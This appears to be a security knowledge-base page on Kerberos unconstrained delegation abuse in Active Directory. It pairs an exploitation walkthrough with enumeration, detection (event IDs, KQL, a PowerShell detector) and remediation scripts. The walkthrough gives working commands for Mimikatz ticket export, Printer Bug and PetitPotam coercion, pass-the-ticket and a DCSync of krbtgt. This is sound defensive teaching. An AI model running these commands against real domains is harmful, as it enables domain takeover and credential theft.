Unconstrained Delegation Abuse
ATT&CK: T1558 — Steal or Forge Kerberos Tickets
Unconstrained delegation is a Kerberos feature that allows a service to impersonate any user who authenticates to it, to any other service in the domain. When a client authenticates to such a service with Kerberos, it sends along a forwarded copy of its own TGT, which the service keeps in LSASS for later use. If a Domain Admin (or a Domain Controller's machine account) authenticates to a machine with unconstrained delegation enabled, that TGT is deposited in the machine's memory, and an attacker with local admin on the machine can extract and reuse it.
What Delegation Is
Kerberos delegation solves a double-hop problem: User authenticates to Web Server A, which needs to query Database B on the user's behalf. Delegation allows A to impersonate the user to B.
| Delegation Type | What It Allows | Risk Level |
|---|---|---|
| Unconstrained | Impersonate user to ANY service in domain | Critical |
| Constrained | Impersonate user to specific allowed services | Moderate |
| Resource-based Constrained (RBCD) | Configured on resource (not service account) | Lower |
How Unconstrained Delegation Works
- The user requests a service ticket (TGS) for the delegating service; because the service account has TRUSTED_FOR_DELEGATION set, the KDC marks the ticket OK-AS-DELEGATE
- Seeing that flag, the client asks the KDC for a forwarded TGT (a TGS-REQ to krbtgt with the FORWARDED option) and sends it, alongside the service ticket, in its AP-REQ to the service
- The service extracts the forwarded TGT and can now request service tickets to any service in the domain as that user
- The TGT is cached in lsass.exe on the delegation server
An attacker with admin access to the delegation server can extract these cached TGTs via Mimikatz and reuse them.
Finding Unconstrained Delegation Servers
# PowerView (matches the TRUSTED_FOR_DELEGATION bit, 0x80000, in userAccountControl)
Get-DomainComputer -Unconstrained -Properties DNSHostName,OperatingSystem,ms-Mcs-AdmPwd   # ms-Mcs-AdmPwd (LAPS) only comes back if you already hold read rights on it
# ActiveDirectory module
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation,ServicePrincipalName
# BloodHound
# Computer node property: unconstraineddelegation=true
# Pre-built query: "Shortest Paths to Unconstrained Delegation Systems"
Domain Controllers have unconstrained delegation by default (their machine accounts carry TRUSTED_FOR_DELEGATION), so a DC in the results is expected and not a finding. The finding is any non-DC computer with the flag, and also any user account with it: unconstrained delegation can be set on service accounts that have an SPN, and the computer-only queries above will miss those.
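The enumeration above, as an added example that is not part of the original page: a raw LDAP search over System.DirectoryServices that needs neither PowerView nor the ActiveDirectory module, covers both computer and user objects, and separates DCs (expected) from everything else (findings). It assumes a domain-joined host whose caller can read the default naming context.

```powershell
# Added example: enumerate accounts with unconstrained delegation over raw LDAP.
# Both computers AND users (service accounts with an SPN) can carry TRUSTED_FOR_DELEGATION,
# so both object categories are searched. Assumes a domain-joined host.
$TRUSTED_FOR_DELEGATION = 0x80000   # userAccountControl bit 524288
$SERVER_TRUST_ACCOUNT   = 0x2000    # userAccountControl bit 8192: domain controller machine accounts

function Get-UnconstrainedDelegation {
    param(
        [string]$SearchBase = ([ADSI]"LDAP://RootDSE").defaultNamingContext
    )
    # 1.2.840.113556.1.4.803 is the LDAP_MATCHING_RULE_BIT_AND rule: true when the bit is set
    $filter = "(&(|(objectCategory=computer)(objectCategory=person))" +
              "(userAccountControl:1.2.840.113556.1.4.803:=$TRUSTED_FOR_DELEGATION))"

    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = [ADSI]"LDAP://$SearchBase"
    $searcher.Filter     = $filter
    $searcher.PageSize   = 1000
    foreach ($p in 'samaccountname','dnshostname','useraccountcontrol','serviceprincipalname','operatingsystem') {
        [void]$searcher.PropertiesToLoad.Add($p)
    }

    foreach ($r in $searcher.FindAll()) {
        $uac  = [int]$r.Properties['useraccountcontrol'][0]
        $isDC = ($uac -band $SERVER_TRUST_ACCOUNT) -ne 0
        [pscustomobject]@{
            Account  = [string]$r.Properties['samaccountname'][0]
            Host     = [string]$r.Properties['dnshostname'][0]      # empty for user objects
            OS       = [string]$r.Properties['operatingsystem'][0]
            SPNCount = $r.Properties['serviceprincipalname'].Count
            IsDC     = $isDC
            Finding  = -not $isDC   # DCs are expected to carry the flag; anything else is a finding
        }
    }
}

# Only the findings; drop the Where-Object to see the DCs as well
Get-UnconstrainedDelegation | Where-Object Finding | Format-Table -AutoSize
```

A user object in the output with SPNCount greater than zero is the case the computer-only queries miss: a service account that is trusted for unconstrained delegation, whose tickets (and the TGTs forwarded to it) live wherever that service runs.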
Exploitation
Step 1: Extract Cached TGTs
# On the unconstrained delegation server (as local admin or SYSTEM)
mimikatz # sekurlsa::tickets /export
# Export all tickets; look for .kirbi files for high-value users
# Directory listing will show:
# [0;12345]-2-1-40e00000-Administrator@krbtgt-DOMAIN.COM.kirbi
Step 2: Wait or Coerce Authentication
If no high-value users have recently authenticated, trigger authentication using the Printer Bug (MS-RPRN) or PetitPotam (EfsRpc):
# Printer Bug - coerce DC01$ to authenticate to the delegation server
# SpoolSample.exe <DC-FQDN> <DelegationServer-FQDN>
# Name the delegation server by FQDN, not IP: the DC only authenticates with Kerberos (and so only
# sends a forwarded TGT) when it can build an SPN for the target; an IP address falls back to NTLM
.\SpoolSample.exe DC01.domain.com DELEGSERVER01.domain.com
# PetitPotam (EfsRpc) - positional arguments are <listener> <target>; the same FQDN rule applies to the listener
python3 PetitPotam.py -u user -p pass -d domain.com DELEGSERVER01.domain.com DC01.domain.com
When DC01's machine account authenticates to DELEGSERVER01 over Kerberos, its forwarded TGT is deposited in DELEGSERVER01's LSASS. Dump tickets straight after the trigger: the ticket is tied to the short-lived network logon session it arrived in, so it may not be there minutes later.
Step 3: Pass the Ticket to Achieve DA
# Import the extracted Domain Controller TGT
mimikatz # kerberos::ptt C:\<path>\DC01$@krbtgt-DOMAIN.COM.kirbi
# Now perform DCSync as the DC machine account
mimikatz # lsadump::dcsync /domain:domain.com /user:krbtgt
Impact: From Unconstrained Delegation to Domain Compromise
Unconstrained Delegation Server
→ Coerce DC authentication (Printer Bug / PetitPotam)
→ DC$ TGT deposited in memory
→ Extract TGT
→ Impersonate DC → DCSync
→ Extract krbtgt hash
→ Golden Ticket
This is one of the most reliable paths to domain compromise from a non-DA foothold with local admin on a delegation server.
Real-World Context
Print servers, web application servers, and legacy application servers are commonly configured with unconstrained delegation, often as a workaround for applications that needed multi-hop authentication and were set up before constrained delegation (available since Windows Server 2003) was understood or supported by the application.
Attack tooling (Impacket, Rubeus) has automated this attack chain. It is a standard escalation path in penetration tests and has been observed in real-world intrusions.
Detection
Event IDs
| Event | Log | Signal |
|---|---|---|
| 4769 | Security (DC) | TGS-REQ for krbtgt with the Forwarded ticket option (0x20000000) set: a forwarded TGT was issued, i.e. the client is about to hand its TGT to a delegation host |
| 4769 | Security (DC) | Service-ticket requests by a DC machine account (DC01$) whose IpAddress is not a DC: the extracted TGT being reused from the attacker's host |
| 4624 | Security (delegation host) | Network logon (type 3) by a DC machine account with no business reason, immediately after a coercion trigger |
| 4662 | Security (DC) | Directory replication access (DS-Replication-Get-Changes-All) attributed to DC01$; on its own this looks legitimate, so correlate with the 4769 reuse signal above |
Key Detection Logic
// KQL - Microsoft Sentinel SecurityEvent table (DC security logs) - forwarded TGTs handed to non-DC hosts
// A forwarded TGT appears as a 4769 for krbtgt with the Forwarded option set. TicketOptions is a hex string whose
// first digit after "0x" holds Forwardable (4), Forwarded (2) and Proxiable (1), so Forwarded set means [2367] there.
// 4769 ServiceName is the service's account name (e.g. APP01$), so a join on client IP shows which host received the TGT.
let forwarded = SecurityEvent
| where EventID == 4769 and ServiceName startswith "krbtgt" and TicketOptions matches regex @"^0x[2367]"
| project FwdTime = TimeGenerated, TargetUserName, IpAddress;
SecurityEvent
| where EventID == 4769 and not(ServiceName startswith "krbtgt")
| where ServiceName !in ("DC01$", "DC02$")   // known DC machine accounts: forwarding to a DC is expected
| join kind=inner forwarded on TargetUserName, IpAddress
| where abs(datetime_diff("second", FwdTime, TimeGenerated)) <= 60
| summarize Count = count(), Principals = make_set(TargetUserName) by DelegationHost = ServiceName, IpAddress
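The same two signals run locally over a handful of constructed 4769 records, as an added example that is not part of the original page: it decodes the TicketOptions bit field the way the table above describes and flags (a) forwarded TGTs being issued and (b) a DC machine account requesting tickets from an address that is not a DC. The sample records, the DC address list and the DC account names are all made up for the example.

```powershell
# Added example: detection logic over constructed 4769 records (not real log data).
# TicketOptions bit values follow the 4769 documentation: Forwardable 0x40000000,
# Forwarded 0x20000000, Renewable 0x00800000. DC names/addresses are placeholders.
$FLAG_FORWARDED = 0x20000000
$DcAccounts  = @('DC01$', 'DC02$')   # assumed DC machine account names
$DcAddresses = @('10.0.0.10')        # assumed DC IP addresses

# Constructed sample records, shaped like the Security 4769 fields used above
$Events = @(
    @{ TargetUserName='alice'; ServiceName='krbtgt';     TicketOptions='0x60810010'; IpAddress='10.0.0.55' }, # forwarded TGT for alice
    @{ TargetUserName='alice'; ServiceName='APP01$';     TicketOptions='0x40810000'; IpAddress='10.0.0.55' }, # ordinary service ticket
    @{ TargetUserName='DC01$'; ServiceName='krbtgt';     TicketOptions='0x60810010'; IpAddress='10.0.0.10' }, # DC01$ forwarding its own TGT (coerced)
    @{ TargetUserName='DC01$'; ServiceName='APP01$';     TicketOptions='0x40810000'; IpAddress='10.0.0.55' }  # DC01$ requesting tickets from a non-DC: stolen TGT in use
)

function Test-Forwarded([string]$TicketOptions) {
    # Convert.ToInt64 with base 16 accepts the "0x" prefix the event uses
    ([Convert]::ToInt64($TicketOptions, 16) -band $FLAG_FORWARDED) -ne 0
}

function Find-DelegationAbuse {
    param([hashtable[]]$Records, [string[]]$DcNames, [string[]]$DcIps)
    foreach ($e in $Records) {
        # Signal 1: forwarded TGT issued (TGS-REQ to krbtgt with FORWARDED set). Some host now holds a
        # reusable TGT for this principal. Noisy where delegation is legitimate, so baseline the IpAddress values.
        if ($e.ServiceName -like 'krbtgt*' -and (Test-Forwarded $e.TicketOptions)) {
            [pscustomobject]@{ Signal = 'ForwardedTGT'; Principal = $e.TargetUserName; Client = $e.IpAddress }
        }
        # Signal 2: a DC machine account asking for service tickets from a non-DC address.
        # Its TGT has left the DC, which only happens if it was extracted and passed elsewhere.
        if ($DcNames -contains $e.TargetUserName -and $DcIps -notcontains $e.IpAddress) {
            [pscustomobject]@{ Signal = 'DCAccountTGTReuse'; Principal = $e.TargetUserName; Client = $e.IpAddress }
        }
    }
}

Find-DelegationAbuse -Records $Events -DcNames $DcAccounts -DcIps $DcAddresses | Format-Table -AutoSize
```

On the sample set this yields three rows: ForwardedTGT for alice from 10.0.0.55, ForwardedTGT for DC01$ from the DC itself (the coercion succeeding), and DCAccountTGTReuse for DC01$ from 10.0.0.55 (the attacker's host using the ticket). The second row is the early warning; the third is the one to page on.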
BloodHound Detection
Run BloodHound regularly to find:
- Computers with the unconstraineddelegation property set outside the DC tier
- Attack paths from those machines to Domain Admins (the pre-built "Shortest Paths to Unconstrained Delegation Systems" query shows who can reach them in the first place)
Mitigation
| Control | Mechanism |
|---|---|
| Remove unconstrained delegation | Clear TRUSTED_FOR_DELEGATION on the computer or service account; where the double hop is genuinely needed, move to constrained delegation by listing the downstream SPNs in msDS-AllowedToDelegateTo, or to RBCD on the resource |
| Mark sensitive accounts as "Account is sensitive and cannot be delegated" | Sets NOT_DELEGATED; the KDC will not issue a forwardable TGT for the account, so nothing lands on the delegation host |
| Protected Users group | Members' TGTs are non-forwardable (delegation blocked) and NTLM/RC4 are disabled for them; machine accounts cannot be protected this way, so DC$ coercion still needs the controls below |
| Disable Spooler service on DCs | Removes the Printer Bug (MS-RPRN) trigger |
| Block EFSRPC coercion on DCs | An RPC filter on the MS-EFSR interface removes the PetitPotam trigger |
| Audit delegation changes | Alert on 4742 (computer) / 4738 (user) where the User Account Control field shows 'Trusted For Delegation' - Enabled, and on the enumeration queries above returning a new host |
| Restrict NTLM | Reduces NTLM relay variants of coercion; it does not stop this path on its own, because the coerced DC authenticates with Kerberos, which is exactly why its TGT is forwarded |
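The controls in the table applied with the ActiveDirectory module, as an added example that is not code from the original page. APP01, SQL01, DC hostnames, domain.com and the break-glass account name are placeholders; it assumes Domain Admin rights, WinRM to the DCs, and that every change is first previewed with -WhatIf.

```powershell
# Added example: remediate unconstrained delegation and harden the accounts it would expose.
# All names are placeholders. Run as Domain Admin; add -WhatIf to each Set-/Add- call to preview.
Import-Module ActiveDirectory

# 1. A server that really needs the double hop: drop TRUSTED_FOR_DELEGATION and switch to
#    constrained delegation by naming only the downstream SPNs it may impersonate users to.
#    (The same two cmdlet calls apply to a user/service account via Set-ADUser.)
Set-ADComputer -Identity 'APP01' -TrustedForDelegation $false
Set-ADComputer -Identity 'APP01' -Add @{ 'msDS-AllowedToDelegateTo' = @('MSSQLSvc/SQL01.domain.com:1433') }

# 2. Privileged users: set "sensitive and cannot be delegated" (NOT_DELEGATED, UAC 0x100000) and
#    add them to Protected Users. Protected Users also disables NTLM and RC4 for the member, so
#    keep the break-glass account out of it and test any scripted admin logons first.
$BreakGlass = 'breakglass-admin'   # assumed name of the emergency account to leave untouched
$privileged = Get-ADGroupMember -Identity 'Domain Admins' -Recursive |
              Where-Object { $_.objectClass -eq 'user' -and $_.SamAccountName -ne $BreakGlass }
foreach ($acct in $privileged) {
    Set-ADUser -Identity $acct.DistinguishedName -AccountNotDelegated $true
    Add-ADGroupMember -Identity 'Protected Users' -Members $acct.DistinguishedName
}

# 3. Remove the Printer Bug trigger: stop and disable the Spooler on every DC
$dcs = (Get-ADDomainController -Filter *).HostName
Invoke-Command -ComputerName $dcs -ScriptBlock {
    Stop-Service -Name Spooler -Force
    Set-Service  -Name Spooler -StartupType Disabled
}

# 4. Verify: after the change, only DC machine accounts should still be trusted for delegation
Get-ADObject -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)' -Properties sAMAccountName,userAccountControl |
    Where-Object { -not ($_.userAccountControl -band 0x2000) } |   # 0x2000 = SERVER_TRUST_ACCOUNT (a DC)
    Select-Object sAMAccountName, DistinguishedName
```

Step 1 sets the attribute on the computer object itself; if the application runs under a dedicated service account, the flag and msDS-AllowedToDelegateTo belong on that account instead, and the verification query in step 4 will show which of the two currently carries it.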
Cross-Links
| Topic | Link |
|---|---|
| Constrained Delegation | constrained-delegation |
| Resource-Based Constrained Delegation | rbcd |
| DCSync | dcsync |
| Pass-the-Ticket | pass-the-ticket |
| Golden Ticket | golden-ticket |